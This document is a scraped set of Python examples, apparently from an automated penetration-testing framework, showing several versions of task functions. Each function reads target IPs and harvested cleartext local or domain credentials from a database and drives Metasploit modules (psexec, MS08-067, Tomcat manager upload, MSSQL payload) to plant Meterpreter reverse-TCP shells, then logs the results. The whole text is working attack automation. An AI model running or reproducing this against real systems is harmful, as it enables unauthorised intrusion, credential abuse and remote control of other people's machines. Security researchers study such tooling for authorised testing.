def run(params):
    sql = "select hd.ip_address, lc.username, lc.cleartext_password, hd.id from host_data hd join local_credentials lc on hd.id = lc.host_data_id where lc.id = %s and lc.cleartext_password != ''"
    cursor = params.db.cursor()
    cursor.execute(sql, (params.item_identifier, ))
    row = cursor.fetchone()
    #print "log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2])
    #params.log("log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2]))
    cursor.close()
    
    setup = [
        "use exploit/windows/smb/psexec", 
        "set PAYLOAD windows/meterpreter/reverse_tcp", 
        "set RHOST {0}".format(row[0]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()),
        "set smbuser {0}".format(row[1]),
        "set smbpass {0}".format(row[2]),
        "exploit"
    ]
    
    log = ""
    for l in exploit.runMsf(params, row[3], setup, "psexec"):
        log = log + l + "\r\n"
        params.log(l)
    
    cursor = params.db.cursor()
    cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[3], 4, log, ))
    cursor.close()
示例#2
0
def run(params):
    sql = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
    cursor = params.db.cursor()
    cursor.execute(sql, params.item_identifier)
    row = cursor.fetchone()
    #print "exploit ms08-067 on host {0}".format(row[1])
    params.log("exploit ms08-067 on host {0}".format(row[1]))
    cursor.close()
    
    setup = [
        "use exploit/windows/smb/ms08_067_netapi", 
        "set PAYLOAD windows/meterpreter/reverse_tcp", 
        "set RHOST {0}".format(row[1]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()),
        "exploit"
    ]
    
    log = ""
    for l in exploit.runMsf(params, row[0], setup, "ms08_067"):
        log = log + l + "\r\n"
    
    cursor = params.db.cursor()
    cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 1, log))
    cursor.close()
def run(params):
    sql = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
    cursor = params.db.cursor()
    cursor.execute(sql, params.item_identifier)
    row = cursor.fetchone()
    #print "exploit weak tomcat creds on host {0}".format(row[1])
    params.log("exploit weak tomcat creds on host {0}".format(row[1]))
    cursor.close()
    
    creds = row[3].split(":")
    
    setup = [
        "use exploit/multi/http/tomcat_mgr_upload", 
        "set PAYLOAD windows/meterpreter/reverse_tcp", 
        "set RHOST {0}".format(row[1]),
        "set RPORT {0}".format(row[2]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()),
        "set TARGET 1",
        "set username {0}".format(creds[0]),
        "set password {0}".format(creds[1]),
        "exploit"
    ]
    
    log = ""
    for l in exploit.runMsf(params, row[0], setup, "tomcat_creds"):
        log = log + l + "\r\n"
    
    cursor = params.db.cursor()
    cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 3, log))
    cursor.close()
示例#4
0
def run(params):
    sql = "select hd.ip_address, lc.username, lc.cleartext_password, hd.id from host_data hd join local_credentials lc on hd.id = lc.host_data_id where lc.id = %s and lc.cleartext_password != ''"
    cursor = params.db.cursor()
    cursor.execute(sql, (params.item_identifier, ))
    row = cursor.fetchone()
    #print "log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2])
    #params.log("log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2]))
    cursor.close()
    
    setup = [
        "use exploit/windows/smb/psexec", 
        "set PAYLOAD windows/meterpreter/reverse_tcp", 
        "set RHOST {0}".format(row[0]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()),
        "set smbuser {0}".format(row[1]),
        "set smbpass {0}".format(row[2]),
        "exploit"
    ]
    
    log = ""
    for l in exploit.runMsf(params, row[3], setup, "psexec"):
        log = log + l + "\r\n"
        params.log(l)
    
    cursor = params.db.cursor()
    cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[3], 4, base64.b64encode(log), ))
    cursor.close()
def run(params):
    sql = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
    cursor = params.db.cursor()
    cursor.execute(sql, (params.item_identifier, ))
    row = cursor.fetchone()
    #print "exploit weak tomcat creds on host {0}".format(row[1])
    #params.log("exploit weak tomcat creds on host {0}".format(row[1]))
    cursor.close()

    creds = row[3].split(":")

    setup = [
        "use exploit/multi/http/tomcat_mgr_upload", "set TARGET 1",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        "set RHOST {0}".format(row[1]), "set RPORT {0}".format(row[2]),
        "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format(
            params.getOpenPort()), "set username {0}".format(creds[0]),
        "set password {0}".format(creds[1]), "exploit"
    ]

    log = ""
    result = exploit.runMsf(params, row[0], setup, "tomcat_creds")
    for l in result[1]:
        log = log + l + "\r\n"
        params.log(l)

    if result[0] == True:
        cursor = params.db.cursor()
        cursor.execute(
            "update host_data set successful_info_gather = true where id = %s",
            (row[0], ))
        cursor.close()

    cursor = params.db.cursor()
    cursor.execute(
        "insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)",
        (
            row[0],
            3,
            base64.b64encode(log),
        ))
    cursor.close()
def run(params):
    sql = """
        select
            hd.id, hd.ip_address, dc.domain, dc.username, dc.cleartext_password
        from
            domain_credentials_map m
            join host_data hd on hd.id = m.host_data_id
            join domain_credentials dc on dc.id = m.domain_credentials_id
        where
            m.id = %s"""
            
    cursor = params.db.cursor()
    cursor.execute(sql,  params.item_identifier)
    row = cursor.fetchone()
    host_data_id = row[0]
    #print "log into host {0} with domain creds {1}\{2}:{3}".format(row[1], row[2], row[3], row[4])
    params.log("log into host {0} with domain creds {1}\{2}:{3}".format(row[1], row[2], row[3], row[4]))
    cursor.close()
    
    setup = [
        "use exploit/windows/smb/psexec", 
        "set PAYLOAD windows/meterpreter/reverse_tcp", 
        "set RHOST {0}".format(row[1]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()),
        "set smbdomain {0}".format(row[2]),
        "set smbuser {0}".format(row[3]),
        "set smbpass {0}".format(row[4]),
        "exploit"
    ]
    
    log = ""
    
    for l in exploit.runMsf(params, row[0], setup, "psexec"):
        log = log + l + "\r\n"
    
    #TODO: add way to verify whether the psexec run was successful,
    #if it was, mark it as so in the host_data table
    #exclude these from future runs
    cursor = params.db.cursor()
    cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (host_data_id, 4, log))
    cursor.close()
示例#7
0
def run(params):
    sql = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
    cursor = params.db.cursor()
    cursor.execute(sql, (params.item_identifier, ))
    row = cursor.fetchone()
    #print "exploit ms08-067 on host {0}".format(row[1])
    #params.log("exploit ms08-067 on host {0}".format(row[1]))
    cursor.close()

    setup = [
        "use exploit/windows/smb/ms08_067_netapi",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        "set RHOST {0}".format(row[1]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()), "exploit"
    ]

    log = ""
    result = exploit.runMsf(params, row[0], setup, "ms08_067")
    for l in result[1]:
        log = log + l + "\r\n"
        params.log(l)

    if result[0] == True:
        cursor = params.db.cursor()
        cursor.execute(
            "update host_data set successful_info_gather = true where id = %s",
            (row[0], ))
        cursor.close()

    cursor = params.db.cursor()
    cursor.execute(
        "insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)",
        (
            row[0],
            1,
            base64.b64encode(log),
        ))
    cursor.close()
def run(params):
    sql = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
    cursor = params.db.cursor()
    cursor.execute(sql, (params.item_identifier, ))
    row = cursor.fetchone()
    #print "exploit weak sql creds on host {0}".format(row[1])
    #params.log("exploit weak sql creds on host {0}".format(row[1]))
    cursor.close()
    
    creds = row[3].split(":")
    
    setup = [
        "use exploit/windows/mssql/mssql_payload", 
        "set PAYLOAD windows/meterpreter/reverse_tcp", 
        "set RHOST {0}".format(row[1]),
        "set LHOST {0}".format(params.getLocalHost()),
        "set LPORT {0}".format(params.getOpenPort()),
        "set username {0}".format(creds[0]),
        "set password {0}".format(creds[1]),
        "exploit"
    ]
    
    log = ""
    result = exploit.runMsf(params, row[0], setup, "sql_creds")
    for l in result[1]:
        log = log + l + "\r\n"
        params.log(l)
    
    if result[0] == True:
        cursor = params.db.cursor()
        cursor.execute("update host_data set successful_info_gather = 1 where id = %s", (row[0], ))
        cursor.close()
    
    cursor = params.db.cursor()
    cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 2, log, ))
    cursor.close()
def run(params):
    
    sql = """
        select
            hd.id, hd.ip_address, dc.domain, dc.username, dc.cleartext_password, m.id
        from
            domain_credentials_map m
            join host_data hd on hd.id = m.host_data_id
            join domain_credentials dc on dc.id = m.domain_credentials_id
        where
            m.id = %s and
            hd.successful_info_gather = 0 and dc.valid = 1"""
            
    cursor = params.db.cursor()
    cursor.execute(sql,  params.item_identifier)
    row = cursor.fetchone()
    cursor.close()
    
    if row == None:
        #params.log("Authenticate to {0} using creds {1}\\{2}".format(row[1], row[2], row[3]))
        #params.log("")
        #params.log("This task was skipped to save time, as the task has already been run with a different set of creds")
        params.log("this task has already been successfully handled with a different set of creds")
        return
    
    waitForDifferentTask = False
    cursor2 = params.db.cursor()
    sql2 = """select hd.ip_address 
    from task_list tl join domain_credentials_map m on m.id = tl.item_identifier join host_data hd on hd.id = m.host_data_id 
    where tl.task_descriptions_id = 17 and tl.in_progress = 1 and tl.completed = 0 and tl.footprint_id = %s and hd.ip_address = %s and tl.id != %s"""
    cursor2.execute(sql2, (params.footprint_id,  row[1], params.task_id))
    rows = cursor2.fetchall()
    for r in rows:
        waitForDifferentTask = True
        break
    cursor2.close()
    
    if waitForDifferentTask == True:
        time.sleep(5)
        params.log("another task is currently trying the same thing. will try again later")
        params.setReturnValue("run again")
    else:
        
        if row != None:
            host_data_id = row[0]
            #print "log into host {0} with domain creds {1}\{2}:{3}".format(row[1], row[2], row[3], row[4])
            #params.log("log into host {0} with domain creds {1}\{2}:{3}".format(row[1], row[2], row[3], row[4]))
            cursor.close()
            
            setup = [
                "use exploit/windows/smb/psexec", 
                "set PAYLOAD windows/meterpreter/reverse_tcp", 
                "set RHOST {0}".format(row[1]),
                "set LHOST {0}".format(params.getLocalHost()),
                "set LPORT {0}".format(params.getOpenPort()),
                "set smbdomain {0}".format(row[2]),
                "set smbuser {0}".format(row[3]),
                "set smbpass {0}".format(row[4]),
                "exploit"
            ]
            
            log = ""
            
            result = exploit.runMsf(params, row[0], setup, "psexec")
            for l in result[1]:
                log = log + l + "\r\n"
                params.log(l)
            
            if result[0] == True:
                cursor = params.db.cursor()
                cursor.execute("update host_data set successful_info_gather = 1 where id = %s", (row[0]))
                cursor.close()
            else:
                if result[2] == False:
                    cursor = params.db.cursor()
                    cursor.execute("update domain_credentials_map set psexec_failed = 1 where id = %s", (row[5]))
                    cursor.close()
                
            cursor = params.db.cursor()
            cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (host_data_id, 4, log))
            cursor.close()